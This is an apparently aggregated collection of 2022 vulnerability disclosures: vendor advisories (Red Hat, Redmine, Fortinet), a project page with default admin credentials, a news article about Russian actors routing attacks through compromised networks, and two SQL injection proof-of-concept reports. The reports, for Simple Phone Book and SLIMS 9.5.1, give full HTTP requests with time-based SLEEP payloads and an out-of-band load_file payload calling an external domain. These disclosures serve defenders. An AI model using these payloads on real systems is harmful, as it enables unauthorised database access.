Red Hat Security Advisory 2022-8827-01 - Updated images are now available for Red Hat Advanced Cluster Security (RHACS). The updated image includes new features and bug fixes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256====================================================================                   Red Hat Security AdvisorySynopsis:          Low: RHACS 3.73 enhancement and security updateAdvisory ID:       RHSA-2022:8827-01Product:           RHACSAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:8827Issue date:        2022-12-06CVE Names:         CVE-2022-24778 CVE-2022-36056 CVE-2022-42898====================================================================1. Summary:Updated images are now available for Red Hat Advanced Cluster Security(RHACS). The updated image includes new features and bug fixes.Red Hat Product Security has rated this update as having a security impactof Low. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.2. Description:Release of RHACS 3.73 provides these changes:New features:* Red Hat Advanced Cluster Security Cloud Service (ACSCS) is a Red Hatmanaged service that simplifies and accelerates RHACS deployments. ACSCS isavailable as a Field Trial release. For more information about accessingACSCS, contact Red Hat Sales.* Improved Vulnerability Management dashboard for ACSCS users.* PostgreSQL database option is available as Technology Preview feature. Ifyou are interested in participating in the Tech Preview program, contactyour Red Hat account representative.* A new build-time network policy generator as Technology Preview feature,to generate Kubernetes network policies based on Application YAMLmanifests.Notable technical changes:* RHACS uses GraphQL internally to show data in the RHACS portal. However,Red Hat does not support querying RHACS using GraphQL. If you are usingGraphQL, see https://access.redhat.com/articles/6986289 and contact Red HatConsulting.* Sensor no longer uses `anyuid` Security Context Constraint (SCC).Instead, the default SCC for Sensor is now `restricted[-v2]` or`stackrox-sensor`, depending on the settings. In addition, the `runAsUser`and `fsGroup` for the Admission control and Sensor deployments are nolonger hard-coded to `4000` on OpenShift clusters to allow using the`restricted` and `restricted-v2` SCCs. (ROX-9342)* The service account `central`, which the Central deployment uses, nowincludes `get` and `list` access to the pods, events, and namespacesresources in the namespace where you deploy Central.* The CSV export API `/api/vm/export/csv` now requires the `CVE Type`filter as part of the input query parameter. Supported values for `CVEType` are `IMAGE_CVE`, `K8S_CVE`, `ISTIO_CVE`, `NODE_CVE`, and`OPENSHIFT_CVE`.Notice of in-product docs removal:* Beginning in the RHACS 3.74 release, Red Hat will remove the in-productdocs accessible from the help menu. If you are using the in-product docs,you can instead download the required documentation in PDF format from RedHat Customer Portal. (ROX-12839)Bug fixes:* Previously, if you were using StackRox Kubernetes Security Platform -Splunk Technology Add-on, results for the `ocp4-cis-node` compliancestandard was missing from Splunk. This issue is now fixed. The Splunkintegration now includes the `ocp4-cis-node` compliance standard results.(ROX-11937)* Previously, Central would fail on the v1 CronJob deployment check. Thisissue is fixed. (ROX-13500)Security Fix(es):* imgcrypt: Unauthorized access to encryted container image on a sharedsystem due to missing check in CheckAuthorization() code path(CVE-2022-24778)* app-containers/cosign: false positive verification (CVE-2022-36056)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.3. Solution:To take advantage of the new features, bug fixes, and enhancements in RHACS3.73 you are advised to upgrade to RHACS 3.73.0.4. Bugs fixed (https://bugzilla.redhat.com/):2069368 - CVE-2022-24778 imgcrypt: Unauthorized access to encryted container image on a shared system due to missing check in CheckAuthorization() code path2128820 - CVE-2022-36056 app-containers/cosign: false positive verification5. JIRA issues fixed (https://issues.jboss.org/):ROX-13687 - Release RHACS 3.73.06. References:https://access.redhat.com/security/cve/CVE-2022-24778https://access.redhat.com/security/cve/CVE-2022-36056https://access.redhat.com/security/cve/CVE-2022-42898https://access.redhat.com/security/updates/classification/#lowhttps://docs.openshift.com/acs/3.73/release_notes/373-release-notes.html7. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2022 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBY4+QLtzjgjWX9erEAQhgOxAAl3J3PEic6f7jSpbFNJVnj4ACQxursTFGCX9qxbMTwCy19vqKx/pummlobOSRhweidwVJMMSIaXW0/ZLJyuyLDhKBjrBhjq67kpuJBilDSDWwZNJLqtU9QFx/VJyHcnACuPf22SFouXW3FZS6a4dlvK2N7va3WiwcyW29PdwRjfe8gft8UIbzLb3T2UokXwNY5s34y8q8y1Lr2KFUqFxM7e/IKl3XrLPag+rPGsw/boYhHU6U9LspaBlZ/0wv4SnYQHPvS/t5kMKiA+yRvUDmpYKo23Hi7SK+Y2c7yKUwqmeuem6ZmdefJkhTfVmTcptik1f/ie9rOHvpFeSZdZ5laEOm4DGixuh3J1qxtcMsUItYO1S8iLbF17z1jkT3V2bEZmLRjKD8L28EhYS6nqX2IfBl8wjhlbbDtv9LGFWbwwec+j1/k1kMz5u3tQThkeO9znJNYC0QiE07h28A77u7oLkC3r1OksfYvIcaQ8f8NC7AkT4kK9LhGU/w99z7y+TNErIlx3/ws3HvaSfjGsDsSVEiRh/AyCflqb5FioiHf5Mt88IoIH2mk3SUlDVyg0r5WUajdN9WQqAogTtUTesUxnUgOjuGLfxY+vVOsfSekZAk+LnlFkMrYfd28IhT9bkEFhW1NbSF5C1wfY82rpuUC1aPvsB3ua+lxqlw1gy7Hpo=If/b-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8827-01

Simple Phone Book/Directory Web App v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter at /PhoneBook/edit.php.

**Simple Phone book/directory Web App v1.0 by bakhtiar has SQL injection**

BUG\_Author: realguoxiufeng

vendors:https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html

Vulnerability File: /PhoneBook/edit.php

GET parameter 'editid' exists SQL injection vulnerability

Payload1: /PhoneBook/edit.php?editid=1'

    GET /PhoneBook/edit.php?editid=1' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

sql statement error

Payload2: /PhoneBook/edit.php?editid=1''

    GET /PhoneBook/edit.php?editid=1'' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

Page successfully displayed

Payload3: /PhoneBook/edit.php?editid=1%27%20AND%20(SELECT%202%20FROM%20(SELECT(SLEEP(10)))A)--%20B

    GET /PhoneBook/edit.php?editid=1%27%20AND%20(SELECT%202%20FROM%20(SELECT(SLEEP(10)))A)--%20B HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

The server's response time is 10 seconds

CVE-2022-45010: bug_report/SQLi-1.md at main · realguoxiufeng/bug_report

Rapid Software LLC Rapid SCADA 5.8.4 is vulnerable to Cross Site Scripting (XSS).

**Исследования**

Ежедневное исследование Казнета и новых способов взлома и защиты информационных систем - ответственная миссия команды NitroTeam.

Мы глубоко озабочены состоянием Информационной Безопасности в Казахстане и делимся своими наработками здесь на сайте и в социальных сетях.

 06.12.2022 0  84

**\[CVE-2022-44153\] XSS уязвимость в Rapid SCADA 5.8.4**

WEB

Наш исследователь @claunch3r обнаружил XSS уязвимость в програмном обеспечении Rapid SCADA 5.8.4

 02.06.2022 0  5166

**Множественные уязвимости в LibreHealth part 2**

WEB

Во время стажировки в нашей компании, студенты нашли множественные уязвимости в LibreHealth: Broken Access Control (CVE-2022-31496), Cross-Site Scripting (CVE-2022-31492, CVE-2022-31493, CVE-2022-31494, CVE-2022-31495, CVE-2022-31497, CVE-2022-31498).

 04.05.2022 0  9060

**Описание уязвимостей CVE-2022-29938, CVE-2022-29939, CVE-2022-29940 в LibreHealth**

WEB

Наш исследователь нашел в LibreHealth EHR 2.0.0 множественные уязвимости, а именно 1 SQL-injection (CVE-2022-29938) и 2 Cross-site scripting (XSS) (CVE-2022-29939, CVE-2022-29940)

 15.02.2021 0  8018

**Описание CVE-2020-29139, CVE-2020-29140, CVE-2020-29142, CVE-2020-29143 в OpenEMR 6.0.0-dev, OpenEMR 5.0.2(5)**

WEB

В ходе исследования движка для медицинских организаций OpenEMR с открытым исходным кодом были обнаружены 4 уязвимости типа SQL-инъекция. Тестирование уязвимостей производилось на Windows 10, Apache 2.4, 10.3.22-MariaDB. PHP 7.1.33 для OpenEMR 5.0.2(5) и PHP 7.4 для OpenEMR 6.0.0-dev. Настоятельно рекомендуем обновиться до последней версии продукта.

CVE-2022-44153: Nitro Team Researches

Redmine 5.x before 5.0.4 allows downloading of file attachments of any Issue or any Wiki page due to insufficient permission checks. Depending on the configuration, this may require login as a registered user.

This page lists the security vulnerabilities that were fixed in Redmine releases, starting from 1.3.0. If you think that you've found a security vulnerability, please report it by sending an email to: security(at)redmine.org.

To detect if your own Redmine is subject to any of these vulnerabilties, you can use Planio's Redmine Security Scanner.

Severity Details External references Affected versions Fixed versions Critical Access Control Issue in attachments#download\_all (#37772) CVE-2022-44030 5.0.0 - 5.0.3 5.0.4 High Persistent XSS in textile formatting due to blockquote citation (#37751) CVE-2022-44031 All prior releases 5.0.4 and 4.2.9 High Redmine contains a cross-site scripting vulnerability (#37767) CVE-2022-44637 All prior releases 5.0.4 and 4.2.9 Moderate Open Redirect in attachments#download\_all (#37880) All prior releases since 4.2.0 5.0.4 and 4.2.9 Moderate Unbounded resource exhaustion in cmark-gfm autolink extension may lead to denial of service (#37872) CVE-2022-39209 5.0.0 - 5.0.2 5.0.4 and 4.2.9 Moderate no-permission-check allows issue creation in closed/archived projects (#37187) All prior releases 5.0.2 and 4.2.7 High Information Leak in QueryAssociationColumn and QueryAssociationCustomFieldColumn (#37255) All prior releases since 3.4.0 5.0.2 and 4.2.7 High Remote code execution in commonmarker gem (#37136) CVE-2022-24724 5.0.0 and 5.0.1 5.0.2 Moderate 3 XSS security vulnerabilities in jQuery UI < v1.13.0 (#37256) CVE-2021-41182, CVE-2021-41183, CVE-2021-41184 All prior releases 5.0.2 and 4.2.7 Moderate Ruby on Rails vulnerability (announcement) CVE-2022-22577, CVS-2022-27777 All prior releases 5.0.1 and 4.2.6 Moderate Ruby on Rails vulnerability (announcement) CVE-2022-23633 All Redmine 4.\* versions 4.2.4 and 4.1.6 Moderate Activities index view is leaking usernames (#35789) CVE-2021-42326 All prior releases 4.2.3 and 4.1.5 Low User sessions not reset after activation of two-factor authentication (#35417) CVE-2021-37156 4.2.0 and 4.2.1 4.2.2 High Ruby on Rails vulnerabilities (announcement) CVE-2021-22885, CVE-2021-22904 All prior releases 4.2.2 and 4.1.4 Low Mail handler bypasses add\_issue\_notes permission (#35045) CVE-2021-31864 All prior releases since 3.3.0 4.2.1, 4.1.3 and 4.0.9 Moderate Allowed filename extensions of attachments can be circumvented (#34367) CVE-2021-31865 All prior releases 4.2.1, 4.1.3 and 4.0.9 Critical Arbitrary file read in Git adapter (#35085) CVE-2021-31863 All prior releases 4.2.1, 4.1.3 and 4.0.9 Moderate SysController and MailHandlerController are vulnerable to timing attack (#34950) CVE-2021-31866 All prior releases to 4.2.0 4.2.0, 4.1.3 and 4.0.9 High Inline issue auto complete doesn't sanitize HTML tags (#33846) CVE-2021-29274 4.1.0 and 4.1.1 4.1.2 and 4.0.8 Moderate Names of private projects are leaked by issue journal details that contain project\_id changes(#33360) CVE-2021-30163 All prior releases 4.1.2 and 4.0.8 High Issues API bypasses add\_issue\_notes permission (#33689) CVE-2021-30164 All prior releases since 3.3.0 4.1.2 and 4.0.8 High Ruby on Rails vulnerabilities (rails 5.2.4.3, rails 5.2.4.5) CVE-2020-8162, CVE-2020-8164, CVE-2020-8165, CVE-2020-8166, CVE-2020-8167, CVE-2021-22880, CVE-2021-22881 All prior releases 4.1.2 and 4.0.8 Moderate XSS vulnerability due to missing back\_url validation (#32850) CVE-2020-36306 All prior releases 4.1.1 and 4.0.7 High Persistent XSS vulnerabilities in textile inline links (#32934) CVE-2020-36307 All prior releases 4.1.1 and 4.0.7 Moderate Time entries CSV export may disclose subjects of issues that are not visible CVE-2020-36308 All prior releases 4.1.1 and 4.0.7 Moderate Improper markup sanitization in Textile formatting (#25742) CVE-2019-25026 All prior releases 4.0.6 and 3.4.13 Critical SQL injection CVE-2019-18890 Redmine <= 3.3.9 3.3.10 High Persistent XSS in textile formatting CVE-2019-17427 All prior releases 3.4.11 and 4.0.4 Critical Ruby on Rails vulnerabilities (announcement) CVE-2019-5418, CVE-2019-5419, CVE-2019-5420 All prior releases 3.4.10 and 4.0.3 High Remote command execution through mercurial adapter CVE-2017-18026 All prior releases 3.2.9, 3.3.6 and 3.4.4 High Multiple XSS vulnerabilities (#27186) CVE-2017-15568, CVE-2017-15569, CVE-2017-15570, CVE-2017-15571 All prior releases 3.2.8, 3.3.5 and 3.4.3 Low Email reminders reveal information about inaccessible issues (#25713) CVE-2017-16804 All prior releases 3.2.7, 3.3.4 and 3.4.0 Moderate Improper markup sanitization in wiki content (#25503) CVE-2017-15573 All prior releases 3.2.6 and 3.3.3 Moderate Use redirect on /account/lost\_password to prevent password reset tokens in referers (#24416) CVE-2017-15572 All prior releases 3.2.6 and 3.3.3 Moderate Redmine.pm doesn't check that the repository module is enabled on project (#24307) CVE-2017-15575 All prior releases 3.2.6 and 3.3.3 High Stored XSS with SVG attachments (#24199) CVE-2017-15574 All prior releases 3.2.6 and 3.3.3 Moderate Information leak when rendering Time Entry on activity view (#23803) CVE-2017-15576 All prior releases 3.2.6 and 3.3.3 Moderate Information leak when rendering Wiki links (#23793) CVE-2017-15577 All prior releases 3.2.6 and 3.3.3 High Persistent XSS vulnerabilities in text formatting (Textile and Markdown) and project homepage CVE-2016-10515 All prior releases 3.2.3 Critical ImageMagick vulnerabilities CVE-2016-3714 All prior releases since 2.1.0 3.1.5 and 3.2.2 Moderate Data disclosure in atom feed CVE-2015-8537 All prior releases 2.6.9, 3.0.7 and 3.1.3 Moderate Potential changeset message disclosure in issues API CVE-2015-8473 All prior releases 2.6.8, 3.0.6 and 3.1.2 Moderate Data disclosure on the time logging form CVE-2015-8346 All prior releases 2.6.8, 3.0.6 and 3.1.2 Moderate Open Redirect vulnerability CVE-2015-8474 2.5.1 to 2.6.6, 3.0.0 to 3.0.4 and 3.1.0 2.6.7, 3.0.5 and 3.1.1 Low Potential XSS vulnerability when rendering some flash messages CVE-2015-8477 All prior releases 2.6.2 and 3.0.0 Moderate Potential data leak (project names) in the invalid form authenticity token error screen All prior releases 2.4.6 and 2.5.2 Moderate Open Redirect vulnerability JVN#93004610, CVE-2014-1985 All prior releases 2.4.5 and 2.5.1 Critical Ruby on Rails vulnerability (announcement) All releases prior to 2.2.4 2.2.4, 2.3.0 Critical Ruby on Rails vulnerability (announcement) All releases prior to 2.2.3 2.2.3 Critical Ruby on Rails vulnerability (announcement) All releases prior to 2.2.1 and 2.1.6 Fix for 1.4.7 Critical Ruby on Rails vulnerability (announcement) All releases prior to 2.2.1 and 2.1.6 1.4.7 Critical Ruby on Rails vulnerability (announcement) All prior releases 2.2.1, 2.1.6, 1.4.6 Moderate XSS vulnerability 2.1.0 and 2.1.1 2.1.2 High Persistent XSS vulnerability JVN#93406632, CVE-2012-0327 All prior releases 1.3.2 Moderate Mass-assignemnt vulnerability that would allow an attacker to bypass part of the security checks All prior releases 1.3.2 High Vulnerability that would allow an attacker to bypass the CSRF protection All prior releases 1.3.0

CVE-2022-44030: Security Advisories - Redmine

AutoTaxi Stand Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component search.php.

**Auto/Taxi Stand Management System using PHP and MySQL**

“Auto/Taxi Stand Management System” is a web-based technology that will manage the records of the incoming and outgoing autos and taxis in a parking stand. It’s an easy for Admin to retrieve the data if the auto and taxi has been visited through the number he can get that data“Auto/Taxi Stand Management Project in PHP”  is an automatic system that delivers data processing in very high speed in a systematic manner.

**Project Requirements**

Project Name

Auto/Taxi Stand Management System Project (Using PHP & MYSQLi)

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In “Auto/Taxi Stand Management System project”  we use PHP and MySQL database. This is the project which keeps records of the auto and taxi which is going to park in the stand. “Auto/Taxi Stand Management System”  have module i.e., admin and user.

**User**

User can only view the Auto/Taxi stand recipient by using their name and mobile number. number.

**Admin**

**Dashboard**: In this sections, the admin can briefly view the number of auto and taxi entries in a particular period.

**New Auto/Taxi Entry**: In this section, admin add auto and taxi which is going into the stand.

**Manage Auto/Taxi Entry**: In this section, admin can manage incoming and outgoing auto and taxi and the admin can also add parking charges and his/her remarks.

**Reports**: In this section admin can generate auto and taxi entry reports between two dates.

Admin can also update his profile, change the password and recover the password.

****Some of the Project Screens****

**Admin Login**

**Admin Dashboard**

**Auto/Taxi Stand Entry Form**

**Auto/Taxi Stand Receipt**

**How to run the Auto/Taxi Stand Management System Project Using PHP and M**ySQL****

1\. Download the zip file

2\. Extract the file and copy atsms  folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/HTML)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name atsmsdb

6\. Import atsmsdb.sql file(given inside the zip package in the SQL file folder)

7\. Run the script http://localhost/atsms

**Credential for admin panel :**  
Username: admin  
Password: Test@123

**View Demo**

**Download Project Source Code**

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-43369: Auto/Taxi Stand Management System Project in PHP | Auto Stand Management Project

An improper neutralization of special elements used in an SQL Command ('SQL Injection') vulnerability in Fortinet FortiADC version 7.1.0, version 7.0.0 through 7.0.2 and version 6.2.4 and below allows an authenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests.

** PSIRT Advisories**

**FortiADC - SQL injection vulnerability in configuration backup feature**

**Summary**

An improper neutralization of special elements used in an SQL Command ('SQL Injection') vulnerability \[CWE-89\] in FortiADC may allow an authenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests.

**Affected Products**

FortiADC version 7.1.0  
FortiADC version 7.0.0 through 7.0.2  
FortiADC version 6.2.0 through 6.2.4  
FortiADC version 6.1 all versions  
FortiADC version 6.0 all versions  
FortiADC version 5.4 all versions  
FortiADC version 5.3 all versions  
FortiADC version 5.2 all versions

**Solutions**

Please upgrade to FortiADC version 7.1.1 or above  
Please upgrade to FortiADC version 7.0.3 or above  
Please upgrade to FortiADC version 6.2.5 or above

**Acknowledgement**

Internally discovered and reported by Théo Leleu of Fortinet Product Security team.

CVE-2022-33875: Fortiguard

An XML external entity (XXE) injection vulnerability in Kwoksys Kwok Information Server before v2.9.5.SP31 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks.

CVE-2022-45326: Kwoksys 2.9.5 XXE

Senayan Library Management System version 9.5.1 suffers from a remote SQL injection vulnerability.

## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 12.06.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.5.1/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1## Description:The manual insertion `point 4` appears to be vulnerable to SQLinjection attacks.The payload '+(selectload_file('\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\ejf'))+'was submitted in the manual insertion `point 4` testing.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can execute a very dangerous `subquery` to view verysensitive information.## STATUS: HIGH Vulnerability[+] Payload:```MySQLGET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&membershipType=a&collType=aaaaHTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=tc5upjgvv2j3mid2ur5tdmmpje; admin_logged_in=1;SenayanMember=schm4nbtgbb5i1tbeonr6cav3uConnection: close```[+] Response:```MySQLHTTP/1.1 200 OKDate: Tue, 06 Dec 2022 13:51:38 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockContent-Length: 4120Connection: closeContent-Type: text/html; charset=UTF-8<!doctype html><html><head><title>Loan Report by Class Report</title>    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <link rel="stylesheet" type="text/css"href="/slims9_bulian-9.5.1/css/bootstrap.min.css"/>    <link rel="stylesheet" type="text/css"href="/slims9_bulian-9.5.1/admin/admin_template/default/style.css?31085233"/>    <script type="text/javascript"src="/slims9_bulian-9.5.1/js/jquery.js"></script>    <script type="text/javascript"src="/slims9_bulian-9.5.1/js/gui.js"></script></head><body><div id="pageContent">  <div class="mb-2">Loan Recap By Class<strong>bbbb'+(select*from(select(sleep(5)))a)+'</strong> for year<strong>2002</strong> <a class="s-btn btn btn-default printReport"onclick="window.print()" href="#">Print Current Page</a><ahref="../xlsoutput.php" class="s-btn btn btn-default"target="_BLANK">Export to spreadsheet format</a>    <a class="s-btn btn btn-info notAJAX openPopUp"href="/slims9_bulian-9.5.1/admin/modules/reporting/pop_chart.php"width="700" height="530" title="Loan Recap By Class">Show inchart/plot</a></div><table class="s-table table table-sm table-bordered"><tr><thclass="dataListHeaderPrinted">Classification</th><thclass="dataListHeaderPrinted">Jan</th><thclass="dataListHeaderPrinted">Feb</th><thclass="dataListHeaderPrinted">Mar</th><thclass="dataListHeaderPrinted">Apr</th><thclass="dataListHeaderPrinted">May</th><thclass="dataListHeaderPrinted">Jun</th><thclass="dataListHeaderPrinted">Jul</th><thclass="dataListHeaderPrinted">Aug</th><thclass="dataListHeaderPrinted">Sep</th><thclass="dataListHeaderPrinted">Oct</th><thclass="dataListHeaderPrinted">Nov</th><thclass="dataListHeaderPrinted">Dec</th></tr><tr><td><strong>bbbb'+(select*from(select(sleep(5)))a)+'00</strong></td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'00</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'10</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'20</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'30</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'40</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'50</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'60</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'70</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'80</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'90</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td></table></div><div class="loader"></div><script type="text/javascript">    // if we are inside iframe    jQuery(document).ready(function () {          });</script></body></html>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1)## Proof and Exploit:[href](https://streamable.com/gthu91)## Time spent`04:00:00`

Senayan Library Management System 9.5.1 SQL Injection

Victims include at least 15 healthcare organizations, one Fortune 500 company, and other organizations in multiple countries, security vendor says.

Russia-affiliated threat actors have compromised systems belonging to multiple organizations in the US, the UK, France, and other countries and are using them to launch attacks against targets in Ukraine.

Among those whose networks the threat actors have hijacked are at least 15 healthcare organizations, one Fortune 500 company, and one dam-monitoring system, according to a study by threat intelligence and cyber-deception company Lupovis published Dec. 6.

"Russian criminals are rerouting through their networks to launch cyberattacks on Ukrainian \[organizations\], which effectively means they are using these organizations to carry out their dirty work," Lupovis warned in its report.

Lupovis recently deployed a set of decoy documents, Web portals, and SSH services on the Internet as part of an effort to study Russian threat activity targeting Ukrainian entities. The goal was to find out the extent to which Russia's war in Ukraine had spilled over into the cyber realm, like many predicted it would.

**Ukraine-Themed Decoys**

The company designed the decoys in a manner as to entice Russian actors looking to compromise Ukrainian targets. For instance, Lupovis labeled decoy documents with names related to Ukrainian government officials and the country's Critical National Infrastructure, and its decoy websites spoofed Ukrainian government and political sites. The decoy documents contained information that adversaries would consider useful, such as usernames, passwords, and addresses to purportedly critical assets and databases on the decoy websites. The company deliberately leaked some of these fake documents in key Dark Web forums.

Lupovis managed to attract three types of adversaries to its decoy sites. One set comprised of opportunistic attackers, or those constantly scanning the Internet for exploitable CVEs and systems. This was a category of threat actor that Lupovis ignored for the purposes of its study. The second category of adversary was comprised of threat actors who landed directly on the decoy sites without following the breadcrumbs that Lupovis had planted on the Dark Web forums. The third set of threat actors were mostly Russia-based adversaries who took the bait, extracted information from the decoy documents, and used it to attack the decoy websites.

In all, between 50 and 60 attackers landed on each of the two decoy sites Lupovis has set up — some of them just minutes after the sites went live. Once on the sites, the attackers carried out a variety of malicious activities, including SQL injection attacks, remote file inclusion tactics, and Docker exploitation attempts. In many cases, threat actors on the decoy sites attempted to make them part of bigger DDoS botnets or to use them to launch attacks against other Ukrainian websites.

